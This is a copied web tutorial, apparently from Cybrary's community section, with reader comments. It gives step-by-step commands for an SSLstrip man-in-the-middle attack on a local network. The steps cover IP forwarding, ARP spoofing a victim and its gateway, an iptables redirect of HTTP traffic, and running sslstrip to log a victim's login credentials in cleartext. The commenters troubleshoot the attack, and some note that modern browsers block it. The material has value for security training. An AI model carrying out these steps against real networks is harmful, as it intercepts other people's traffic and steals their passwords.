Difference between revisions of "MITM: sslstrip"

Sumber: https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/

Cybrary

   Courses
   Certification
   0P3N
   CH4NN3LS
   Explore
   Teams

Tutorial: Using SSLSTRIP in a “Man in the Middle” Attack Profile image for skyle17 fr4nc1stein June 23, 2015 | Views: 45270 Save Email Begin Learning Cyber Security for FREE Now! FREE REGISTRATIONAlready a Member Login Here SSLSTRIP in a Man in the Middle Attack

Hello guys,

In this tutorial, I’m going to teach you how to use a SSLSTRIP via the Kali OS.

We’ll use SSLSTRIP for sniff or steal password in a Target PC via LAN (Local Area Network). SSLSTRIP is known in hijacking HTTP traffic on a network. For testing, we’ll try to use VMWARE and download the Kali Operating System. I’m using BT5 (Backtrack) in my presentation.

Requirements:

1. Kali OS – Click here

2. Syntax Code from the Author of the SSLSTRIP

3. Common sense

We’re assuming SSLSTRIP is already installed in Kali Operating system:

Step 1: Open Terminal

Step 2: In order to run SSLSTRIP in MITM, you need to know the Target IP and the IP of Gateway of the router. To find the router gateway IP, here’s the code:

route -n

or

netstat -nr

Step 3: Port forward for accept packets and forward as vise versa

disabled = 0

enabled = 1

Code: echo “1” > /proc/sys/net/ipv4/ip_forward

See image below:

image 1

Step 4: In a real attack, we’d be using ARPSPOOF against the layer 2 segments. In the images below, I modified the $routerip, but we make a simple instruction. At step 2, we find the router IP is 192.168.109.2. To use ARSPOOF, follow this code.

Code: arpspoof -i eth0 -t victimip routerip

See images below:

image 2 three 3

Note: The $routerip was already modified in advanced tutorial. Don’t follow the image – you can use this example:

Code: arpspoof -t eth0 -t 192.168.109.18 192.168.109.2

192.168.109.18 = victim ip

192.168.109.2 =router ip or gateway

Step 5: Modify the IP table. Let’s understand iptables: iptables take traffic inbound to our Kali Linux machine, on which the destination is port 80 (also known as the HTTP web port. It redirects traffic to the port 1000, which is listening through the use of SSLSTRIP).

Code: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 1000

See image below:

imahe 4

Step 6: Voila, peak time. We’re going to open our SSLSTRIP.

In Kali:

Application -> kali linux -> information gathering ->sslstrip analysis – >sslstrip

In BT:

Application -> Backtrack -> Exploitation tools -> Web Exploitation Tools ->ssltrip

See the image below: image 5

Run the following to start the SSLSTRIP, which we set at port 1000.

In Kali: Code: sslstrip -l 1000

In BT: Code: python sslstrip.pl –l 1000

Step 7: An example of Victim login at hotmail.com.

See image below: image 6

Step 8: Open the sslstrip.log

See image below:

image 7

The username and password is in cleartext – the blur portion in picture.

Thank you!

Regards from Philippine Security Researcher

/fr4nc1stein

/skyle17 Share and Earn Cybytes FacebookTwitterGoogle+LinkedInEmail Save +1 8 18 Use Cybytes and Tip the Author! Join Share and Earn Cybytes FacebookTwitterGoogle+LinkedInEmail Ready to share your knowledge and expertise? Submit to 0P3N Looking to train your own company? Sign up now using Cybrary Teams! Get access to:

   Unlimited Certificates of Completion
   Unlimited Micro Certification Tests
   Practical CTF Style Assessments
   120 Hands-on Virtual Security Labs

Learn More 18 Comments

   Profile image for mrdnf
   mrdnf
   11:27 am on August 24, 2016

   I followed the instructions but there was nothing in sslstrip.log; any idea please?
   This is my Kali’s version:
   Linux kaliv2 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux

   and Win7 client:
   Host Name: WIN7
   OS Name: Microsoft Windows 7 Enterprise
   OS Version: 6.1.7600 N/A Build 7600
   OS Manufacturer: Microsoft Corporation
   OS Configuration: Member Workstation
   OS Build Type: Multiprocessor Free
   Registered Owner:
   Registered Organization:
   Product ID: 55041-049-8865546-86969
   Original Install Date: 4/15/2010, 4:29:26 PM
   System Boot Time: 8/24/2016, 7:08:18 PM
   System Manufacturer: VMware, Inc.
   System Model: VMware Virtual Platform
   System Type: X86-based PC
   Processor(s): 1 Processor(s) Installed.
   [01]: x64 Family 6 Model 42 Stepping 7 GenuineIntel ~
   2195 Mhz
   BIOS Version: Phoenix Technologies LTD 6.00, 5/20/2014
   Windows Directory: C:\Windows
   System Directory: C:\Windows\system32
   Boot Device: \Device\HarddiskVolume1
   System Locale: en-us;English (United States)
   Input Locale: en-us;English (United States)
   Time Zone:
   Total Physical Memory: 511 MB
   Available Physical Memory: 298 MB
   Virtual Memory: Max Size: 1,535 MB
   Virtual Memory: Available: 879 MB
   Virtual Memory: In Use: 656 MB
   Page File Location(s): C:\pagefile.sys
   Domain:
   Logon Server:
   Hotfix(s): N/A
   Network Card(s): 1 NIC(s) Installed.
   [01]: Intel(R) PRO/1000 MT Network Connection
   Connection Name: Local Area Connection 2
   DHCP Enabled: Yes
   DHCP Server: 192.168.234.254
   IP address(es)
   [01]: 192.168.234.137
   Log in to Reply
   Profile image for zaakkniight
   zaakkniight
   9:25 am on August 15, 2016

   arpspoof -t eth0 -t 192.168.109.18 192.168.109.2
   arpspoof -i eth0 -t 192.168.109.18 192.168.109.2 (I for interface)
   Log in to Reply
   Profile image for mattbelle
   mattbelle
   12:11 pm on July 23, 2016

   the target’s browser gives a warning telling the victim that this site isn’t secured and refuses to proceed
   Log in to Reply
       Profile image for grench
       Grench
       7:42 pm on September 20, 2016

       That is a problem
       Log in to Reply
   Profile image for du54nr
   Du54nR
   4:45 pm on May 4, 2016

   Is it also working with https (443) links ? Facebook like ?
   Log in to Reply
       Profile image for phexcom
       TYEB
       3:56 pm on June 24, 2016

       What it does is that it actually removes the https and replace it with http. Like the name implies SSLstrip. So it just strip off the ssl
       Log in to Reply
   Profile image for
   ken94
   12:38 pm on April 29, 2016

   i think it works on only old versions of browsers,i do update my system,softwares so my my browser firefox stub 46.0 (latest currently)does not fall for the attack,gives some errors when i attempt to open https sites!
   Log in to Reply
       Profile image for grench
       Grench
       7:44 pm on September 20, 2016

       Firefox is really secure and updated with frequency to detect MITM attacks.
       Log in to Reply

Page 3 of 3«123 Comment on This

You must be logged in to post a comment. Related Reads Effective Information Gathering Yields Successful ... Profile image for gh4d3r June 18, 2015 By: GH4D3R 815 The Penetration Testers Framework (PTF) Profile image for grotherus April 15, 2016 By: Johan Grotherus 8626 New Players on the Field January 30, 2017 By: CyberHat 28 ThreatQ 3.0 Adheres to Einstein’s 3 Rules to Str ... February 2, 2017 By: ThreatQuotient 51 Our Revolution We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience. Student Support Get Support Other Pages

   About
   The Team
   Join Our Team
   Press
   Terms of Service
   Verify Certificate
   Archived Cybrary Courses
   Submit Suggestions
   Companies

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons. Get it on Google Play

Support Cybrary

Donate Here to Get This Month's Donor Badge

Cybrary|0P3N Profile image for spiritedwolf spiritedwolf [Part 2]$~Metasploit for Beginners Views: 1278 / April 3, 2017 Profile image for gurubaran gurubaran A Penetration Testing Checklist For Linux Machine – Intrusion Discovery Views: 1477 / April 3, 2017 Profile image for dollar163 Hari Charan HTML Injection Reflected – POST Views: 2567 / April 2, 2017 Profile image for chiheb chiheb chebbi Escaping Linux CHROOT Jail Views: 1842 / April 1, 2017

   FOLLOW US:

© 2016 Cybrary.IT - Privacy Policy - Terms of Service Back to Top Skip to toolbar

   Log in
   Register

Referensi

• https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/
• https://www.youtube.com/watch?v=rMb6V9PTeg4